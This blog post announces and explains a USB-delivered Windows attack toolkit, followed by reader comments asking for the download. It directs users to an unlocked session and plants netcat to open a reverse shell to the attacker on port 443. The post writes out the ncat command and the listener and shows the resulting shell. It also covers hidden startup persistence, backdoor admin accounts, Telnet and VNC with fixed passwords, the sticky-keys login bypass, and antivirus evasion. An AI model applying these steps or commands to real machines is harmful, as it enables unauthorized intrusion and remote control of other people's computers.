exploit1 – MyExploit presents – The Window Cleaner

Happy and very proud to release MyExploit’s 1st release into the tool arena. The development of this tool can be seen here https://myexploit.wordpress.com/control-netcat-av-bypass/

Well it now finally works! And all Exploits are undetected by AV So what does it do? Better to show than to explain.

………………………………………..

MyExploit Presents – The Window Cleaner

PRESS 1 – 10 to select your Exploit, or 10 to EXIT.

………………………………………..

1 – Win7 NetCat Exploit.
2 – Winxp NetCat Exploit.
3 – Win7 Enable Telnet server in Win7. (Takes 45 secs)
4 – Win7 Start the Telnet service once enabled from option 4.
5 – Win7/XP Add username test1 and password abc123 to access telnet.
6 – Win7 Turn local warnings off.
7 – Win7 sticky keys login exploit. (Run twice should request Yes/No reply)
8 – Win7 Elevate from user to admin (creates username test123 password test12
9 – Reboot.
10 – EXIT

Type 1 – 10 then press ENTER:

——————————————————-

So does this look good?

So how to use.

1. Download MyExploit Presents – The Window Cleaner.rar from here. https://www.sugarsync.com/pf/D0853626_933_99046706

NOTE – Updated download address on 30/10/2012 because reworked the elevate option after some testing.

2. Un rar and place the MyExploit Presents – The Window Cleaner folder onto a usb memory stick. Don’t place into a folder inside the usb place direct into the main directory.

3. Open E:\MyExploit Presents – The Window Cleaner\ncat\ and then right click file called nc.bat and edit. This will open in notepad. You need to replace Your-IP-Address with your real IP address. Then save and close.

4.Find an unlocked Windows session and plug the USB stick in open E:\MyExploit Presents – The Window Cleaner

5. Double click Drink Me.bat – This will load the menu.

The options explained

Option 1 – Win7 NetCat Exploit. = A copy of netcat is moved into the hosts c:\ drive and an auto start script to make any cmd screens invisible is moved into C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\

Each time a user logs in Netcat will dial back to you. NOTE!! you need to open E:\MyExploit Presents – The Window Cleaner\ncat\nc.bat By right clicking on it and clicking edit and replacing Your-IP-Address with your real IP address. Example

C:\ncat\ncat.exe -v Your-IP-Address 443 -e cmd.exe
C:\ncat\ncat.exe -v 192.168.1.2 443 -e cmd.exe (save)

Run all options twice as Windows 7 seems to ignore commands 1st time after UAC complains. Then choose option 9 Reboot.

As this host reboots open backtrack up and go to a terminal and type in

root@bt:~# nc -lvvp 443

This will start netcat listener once the user logs in you should see it connect over port https. This also encrypts all data.

Option 2 – Winxp NetCat Exploit. – Is the same as 1 but on Windows XP.

Option 3 – 5 Enable / Start Telnet and add an administrator account with allowed access to telnet group. Nice!

Option 3 – Win7 Enable Telnet server in Win7. (Takes 45 secs)
Option 4 – Win7 Start the Telnet service once enabled from option 4.
Option 5 – Win7/XP Add username test1 and password abc123 to access telnet.

Option 6 – Win7 Turn local warnings off. – Is ran automatically with option 1. This turns off the pop up warnings of a bat file running after the reboot. Not required if option 1 is ran.

Option 7 – Win7 sticky keys login exploit. (Run twice should request Yes/No reply) – This is funny once ran and rebooted at the log in screen pressing shift 6+ times will open a admin level cmd screen!

Option 8 – Win7 Elevate from user to admin (creates username test123 password test123) – If you cant find an open Admin session you can elevate from user to admin. It creates an admin account. Works well!

Option 9 – Reboot.

Option 10 – EXIT

Hope you enjoy.

UPDATE – How to use

1. Download MyExploit Presents – The Window Cleaner unrar and place the folder into default usb directory.
2. Find a Windows session open. Plug USB in and open the MyExploit Presents – The Window Cleaner folder.
3. Double click Drink Me.
4. Menu should load run option 8 Win7 Elevate from user to admin. Run twice to make sure worked.
5. Switch user. You should now see account test123 password is test123. Login as this had admin rights.
6. Reopen usb / MyExploit Presents – The Window Cleaner folder/ncat – and right click on nc (bat file) and edit. change Your-IP-Address with your real ip address. Save
7. Re run Drink Me choose option 1. Run twice again to make sure worked.
8. Run option 7 to change sticky keys with an Admin CMD screen at login page. To access the cmd keep press shift key till it open should take 7 go’s.
9. Run option 3 to enable telnet server. Run twice.
10. Run option 4 to enable telnet once enabled from option 3. Run twice.
11. Run option 5 adds a new admin account that can access telnet. Username = test123 password = test123
12. Reboot.

Go back to your pc and open netcat and set it to listen on port 443

root@bt:~# nc -lvvp 443

Once a client logs in NC on there machine will tunnel cmd service back to your pc.

root@bt:~# nc -lvvp 443
Listening on [any] 443 …
There-IP-Address: inverse host lookup failed: Unknown server error : Connection timed out
Connect to [Your-IP-Address] from (UNKNOWN) [There-IP-Address] 49177
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Also you can now telnet to their machine username and password are test123
=======================================

Update
https://www.sugarsync.com/pf/D0853626_933_99046706

1 – Win7 NetCat Exploit.
2 – Winxp NetCat Exploit.
3 – Win7 Enable Telnet server in Win7. (Takes 45 secs)
4 – Win7 Start the Telnet service once enabled from option 4.
5 – Win7/XP Add username abc123 and password abc123 to access telnet.
6 – Win7 Turn local warnings off.
7 – Win7 sticky keys login exploit. (Run twice should request Yes/No reply)
8 – Win7 Elevate from user to admin (creates username test123 password test123)
9 – Win7 VNC Install. (Password for remote access abc123)
10 – Winxp VNC Install (Password for remote access abc123).
11 – VNC-Add to allowed Firewall.
12 – Win7 / XP VNC-start.
13 – Reboot.
14 – EXIT.
To use option 9 or 10 after running them.

1. Change to fastpush directory

C:\Documents and Settings\Test>cd C:\VNC\fastpush

2. Add the local users IP address to script and press enter

C:\VNC\fastpush>fp82.cmd 192.168.1.2 /vnc /user administrator abc123 /log /noshortcut /firewall /noview (Press Enter)

3. In backtrack

root@bt:~# vncviewer 192.168.1.2:5900
Password:abc123

Advertisements

2 thoughts on “exploit1 – MyExploit presents – The Window Cleaner

  1. the link Is dead, is there any other way to get this awesome tool, I’ve searched all over the internet, but haven’t had any luck, if you guys could help that would be great, thanks in advance.

    1. Hi Ricardo

      Sorry we no longer support the Window Cleaner. If honest I wrote it nearly two years ago and not used it since writing it. It was fun as pwn 8.1 the day it was launched. Funny your the third person to ask about this in all this time. Microsoft asked as well.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s